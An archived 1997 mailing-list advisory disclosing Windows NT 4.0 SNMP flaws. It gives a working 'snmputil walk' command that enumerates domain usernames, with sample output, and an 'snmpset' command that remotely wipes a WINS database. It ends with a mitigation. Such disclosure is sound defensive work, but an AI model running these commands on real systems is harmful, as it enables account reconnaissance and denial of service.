SNMP Insecurity

Aleph One (aleph1@DFW.NET)
Wed, 08 Oct 1997 19:08:37 -0500

---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity

All:

I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging. The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior" and
the second I just found and puts any large NT shop at a serious denial
of service (DOS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.

Here is the simplest NT example I could find to use this:

C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

<hostname> should be a domain controller or server

Sample output at end of message.

2.The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security. If
you understand large scale WINS architecture, you can understand the
implications of this. Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N=number of WINS servers). This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:

cmdDeleteWins OBJECT-TYPE
SYNTAX IpAddress
ACCESS read-write
STATUS mandatory
DESCRIPTION
"This variable when set will cause all
information
pertaining to a WINS (data records, context
information to be deleted from the local WINS.
Use this only when owner-address mapping table
is
getting to near capacity. NOTE: deletion of all

information pertaining to the managed WINS is
not
permitted"
::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1
192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2"
successfully entirely deleted my WINS database.

3. It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.

4. The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.

Regards,

Chris

--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com

-----

C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25

Output:

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.71.117.101.115.116 Value = OCTET STRING - Guest

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.49 Value = OCTET STRING - test1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.50 Value = OCTET STRING - test2

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.51 Value = OCTET STRING - test3

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.52 Value = OCTET STRING - test4

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.53 Value = OCTET STRING - test5

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.54 Value = OCTET STRING - test6

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.55 Value = OCTET STRING - test7

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.56 Value = OCTET STRING - test8

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.57 Value = OCTET STRING - test9

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.6.116.101.115.116.49.48 Value = OCTET STRING - test10

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114 Value = OCTET STRING - testuser

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97 .116.111.114 Value = OCTET STRING - Administrator

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.4 9 Value = OCTET STRING - IUSR_NT4SRVDEV1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.11 8.101.67.109.100.69.120.101.99 Value = OCTET STRING - SQLExecutiveCmdExec

End of MIB subtree.